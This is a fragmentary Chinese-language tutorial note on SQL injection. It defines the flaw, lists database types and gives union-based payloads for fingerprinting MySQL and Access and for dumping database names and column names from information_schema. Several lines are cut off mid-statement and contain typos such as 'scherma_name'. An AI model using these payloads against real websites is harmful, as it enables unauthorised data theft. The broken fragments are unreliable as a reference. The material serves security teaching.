SQL注入原理
当客户端提交的数据未做处理或转意直接带入数据库(My SQL / Sql Server/Access/oracle等数据库 )就造成了SQL注入。...:
sql : oracle , mysql , mssql , access , sqlite , postgersql
no sql: mongodb , redis
MySQL与MSSQL及ACCESS...排序,ACCESS使用TOP排序(TOP在MSSQL也可使用)
判断三种数据库的语句
MySQL:and length(user())>10
ACCESS:and(select count(*)from...,版本及用户名)
and 1=2 union select version(),2,3
再查询所有数据库
and 1=2 union select (select group_concat(scherma_name...),2,3
查询所有字段名
union select (select group_concat(column_name)from information_schema.columns),2,3
查询字段内容